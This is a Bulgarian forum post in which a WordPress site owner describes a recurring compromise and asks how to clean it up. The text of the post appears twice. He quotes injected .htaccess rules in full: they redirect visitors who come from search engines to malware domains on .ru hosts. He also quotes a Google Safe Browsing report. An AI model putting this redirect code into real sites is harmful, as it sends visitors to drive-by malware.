Добър ден,
Предварително се извинявам, вслучай че въпроса/темата вече е бил/а повдиган/отваряна...
Ето за какво става дума. Преди около месец някъде, при опит да си влезна в сайта *ползващ WordPress CMS*, Trial Version-а на Kaspersky ми извади предупредителен прозорец, казвайки нещо от сорта, че сайтът ми /това URL/ съдържа троянец или нещо подобно.
След което, реших да пробвам на следващия ден, като вляза от PC с AVG антивирусна - просто да потвърдя/отхвърля твърдението на Касперски.
И ето някои снимки, които съм направил по това време:
http://prikachi.com/images/646/5303646b.jpg
http://prikachi.com/images/585/5303585k.png
От този момента нататък, аз започнах да "се опитвам", да изчистя този руски MALWARE-ра от сайта си, заради който в момента от Google са Blacklist-нали страницата ми...
Да си продължа мисълта, вече впоследствие разбрах, че някой/ по-скоро някакъв скрипт променя моя .htaccess файл на сървъра ми.
Ето какво бяха сложили първо в него, като съдържание:
//------------------- НАЧАЛО НА ФАЙЛА ----------------------
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://kykufep.ru/count5.php [R=301,L]
</IfModule>
#/c3284d#
//---------------------- КРАЙ НА ФАЙЛА -----------------------------
След това се опитах няколко пъти, да "се преборя" с тази напаст, като кача свой вариант на файла, в който уж бях задал block IP адреси.
//------------------------ НАЧАЛО НА ПЪРВИЯ МОЙ ФАЙЛ ------------
DirectoryIndex index.php
<FILES .htaccess>
order allow,deny
deny from all
</FILES>
<Limit GET>
order allow,deny
deny from 207.46.193.50
deny from 65.52.108.101
deny from 65.52.104.40
allow from all
</Limit>
//----------------------- КРАЙ НА ПЪРВИЯ МОЙ ФАЙЛ ------------------
След 2-3-три дена реших да проверя, дали съм успял да се преборя с този проблем, като си влезнах за пореден път в Google Admin панела.
Но не, там отново си пишеше, че сайтът ми е подозрителен и съдържа/хоства - тоест държи се като мост/за заразяване на други компютри/сайтове.
Казах си, нека опитам още един вариант преди да мина към преинсталация на цялата CMS система. Сканирах няколко пъти страницата си, чрез *специализираните онлайн скенери за Malware и благодарение на тях, стигнах до извода че header.php файла на *Wordpress темата, която ползвах също е заразен.
Ето и как изглежда съдържанието:
http://prikachi.com/images/739/5303739x.jpg
Изтрих въпросният код, и най-наивно :lol: реших, че съм се справил с този проблем, затова пуснах *Request към Google, за да сканират /обходят/ страницата ми наново и я премахнат от Blacklist-а им.
Тази процедура я повторих 2-3 пъти, трия тези кодове от htaccess файла, а те наново от някъде се появяват.
:wink: При което, както се казва и в математиката "на n-тото триене", ми втръсна и направих тотална преинсталация на Wordpress CMS системата си, като обнових до последната версия от EN официалния сайт на WordPress. След което си импортнах страниците/данните от XML файла. Като накрая си инсталирах някаква антивирусна програма, по-точно добавка към Wordpress-а с име "Wordfence"/по описание нейната работа е да сканира и сравни текущото ми съдържание, листинг файлове с първообраз от файлове на Wordpress системата/. При което в момента тя ми показва, някакви съмнителни работи из моите статии. Като съмнителни URL адреси.
Интересното тук, е че като кликна върху линка и' за "Повече Информация от Google" /Google Safe Browsing diagnostic page./, служебната страница на Google ми изписва все едно и също:
//-------------------------- НАЧАЛО -------------------------
What is the current listing status for sxemi.eu?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 3 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 130 pages we tested on the site over the past 90 days, 11 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-09-22, and the last time suspicious content was found on this site was on 2012-09-22.
Malicious software is hosted on 4 domain(s), including bawodnes.ru/, wydybpuv.ru/, nujqamdi.ru/.
This site was hosted on 2 network(s) including AS8972 (PLUSSERVER), AS15169 (Google Internet Backbone).
//---------------------- КРАЙ ---------------------------------
Днес реших, да си прегледам някои от статиите - и наистина, при някои от тях се срещаха съмнителни елементчета. Неуспях да ги прегледам всички статии - то просто е невъзможно за един ден.
Преди малко, проверих отново съдържанието на htaccess файла, тъй като преди няколко дена, бях публикувал чист вариант с въведени Rules.
Това което видях сега, публикувам отдолу:
//------------------- НАЧАЛО НА ФАЙЛА --------------------------
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://qesaqead.ru/count30.php [R=301,L]
</IfModule>
#/c3284d#
//---------------------- КРАЙ НА ФАЙЛА ---------------------------------
Вероятно мнозина от вас са наясно за какво става дума, но аз лично несъм. Нито си имам представа от .htaccess файлове.
Затова Ви моля, за съдействие/съвет как да се отърва веднъж за винаги от тези атаки/.... Как да повиша защитата на страницата си? Ако мина на друга CMS платформа, каква е вероятността проблема пак да се появи ?
P.S. Забравих да попитам, съветите за htaccess файл, които се намират на този URL ( http://www.redcardinal.ie/blogs/11-06-2007/stop-wordpress-overwriting-htaccess/ ) ще ми помогнат ли в моя случай ?
Благодаря на всички предварително!!!
Лек и успешен ден
:wink: :wink: :?:
Предварително се извинявам, вслучай че въпроса/темата вече е бил/а повдиган/отваряна...
Ето за какво става дума. Преди около месец някъде, при опит да си влезна в сайта *ползващ WordPress CMS*, Trial Version-а на Kaspersky ми извади предупредителен прозорец, казвайки нещо от сорта, че сайтът ми /това URL/ съдържа троянец или нещо подобно.
След което, реших да пробвам на следващия ден, като вляза от PC с AVG антивирусна - просто да потвърдя/отхвърля твърдението на Касперски.
И ето някои снимки, които съм направил по това време:
http://prikachi.com/images/646/5303646b.jpg
http://prikachi.com/images/585/5303585k.png
От този момента нататък, аз започнах да "се опитвам", да изчистя този руски MALWARE-ра от сайта си, заради който в момента от Google са Blacklist-нали страницата ми...
Да си продължа мисълта, вече впоследствие разбрах, че някой/ по-скоро някакъв скрипт променя моя .htaccess файл на сървъра ми.
Ето какво бяха сложили първо в него, като съдържание:
//------------------- НАЧАЛО НА ФАЙЛА ----------------------
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://kykufep.ru/count5.php [R=301,L]
</IfModule>
#/c3284d#
//---------------------- КРАЙ НА ФАЙЛА -----------------------------
След това се опитах няколко пъти, да "се преборя" с тази напаст, като кача свой вариант на файла, в който уж бях задал block IP адреси.
//------------------------ НАЧАЛО НА ПЪРВИЯ МОЙ ФАЙЛ ------------
DirectoryIndex index.php
<FILES .htaccess>
order allow,deny
deny from all
</FILES>
<Limit GET>
order allow,deny
deny from 207.46.193.50
deny from 65.52.108.101
deny from 65.52.104.40
allow from all
</Limit>
//----------------------- КРАЙ НА ПЪРВИЯ МОЙ ФАЙЛ ------------------
След 2-3-три дена реших да проверя, дали съм успял да се преборя с този проблем, като си влезнах за пореден път в Google Admin панела.
Но не, там отново си пишеше, че сайтът ми е подозрителен и съдържа/хоства - тоест държи се като мост/за заразяване на други компютри/сайтове.
Казах си, нека опитам още един вариант преди да мина към преинсталация на цялата CMS система. Сканирах няколко пъти страницата си, чрез *специализираните онлайн скенери за Malware и благодарение на тях, стигнах до извода че header.php файла на *Wordpress темата, която ползвах също е заразен.
Ето и как изглежда съдържанието:
http://prikachi.com/images/739/5303739x.jpg
Изтрих въпросният код, и най-наивно :lol: реших, че съм се справил с този проблем, затова пуснах *Request към Google, за да сканират /обходят/ страницата ми наново и я премахнат от Blacklist-а им.
Тази процедура я повторих 2-3 пъти, трия тези кодове от htaccess файла, а те наново от някъде се появяват.
:wink: При което, както се казва и в математиката "на n-тото триене", ми втръсна и направих тотална преинсталация на Wordpress CMS системата си, като обнових до последната версия от EN официалния сайт на WordPress. След което си импортнах страниците/данните от XML файла. Като накрая си инсталирах някаква антивирусна програма, по-точно добавка към Wordpress-а с име "Wordfence"/по описание нейната работа е да сканира и сравни текущото ми съдържание, листинг файлове с първообраз от файлове на Wordpress системата/. При което в момента тя ми показва, някакви съмнителни работи из моите статии. Като съмнителни URL адреси.
Интересното тук, е че като кликна върху линка и' за "Повече Информация от Google" /Google Safe Browsing diagnostic page./, служебната страница на Google ми изписва все едно и също:
//-------------------------- НАЧАЛО -------------------------
What is the current listing status for sxemi.eu?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 3 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 130 pages we tested on the site over the past 90 days, 11 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-09-22, and the last time suspicious content was found on this site was on 2012-09-22.
Malicious software is hosted on 4 domain(s), including bawodnes.ru/, wydybpuv.ru/, nujqamdi.ru/.
This site was hosted on 2 network(s) including AS8972 (PLUSSERVER), AS15169 (Google Internet Backbone).
//---------------------- КРАЙ ---------------------------------
Днес реших, да си прегледам някои от статиите - и наистина, при някои от тях се срещаха съмнителни елементчета. Неуспях да ги прегледам всички статии - то просто е невъзможно за един ден.
Преди малко, проверих отново съдържанието на htaccess файла, тъй като преди няколко дена, бях публикувал чист вариант с въведени Rules.
Това което видях сега, публикувам отдолу:
//------------------- НАЧАЛО НА ФАЙЛА --------------------------
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://qesaqead.ru/count30.php [R=301,L]
</IfModule>
#/c3284d#
//---------------------- КРАЙ НА ФАЙЛА ---------------------------------
Вероятно мнозина от вас са наясно за какво става дума, но аз лично несъм. Нито си имам представа от .htaccess файлове.
Затова Ви моля, за съдействие/съвет как да се отърва веднъж за винаги от тези атаки/.... Как да повиша защитата на страницата си? Ако мина на друга CMS платформа, каква е вероятността проблема пак да се появи ?
P.S. Забравих да попитам, съветите за htaccess файл, които се намират на този URL ( http://www.redcardinal.ie/blogs/11-06-2007/stop-wordpress-overwriting-htaccess/ ) ще ми помогнат ли в моя случай ?
Благодаря на всички предварително!!!
Лек и успешен ден
:wink: :wink: :?: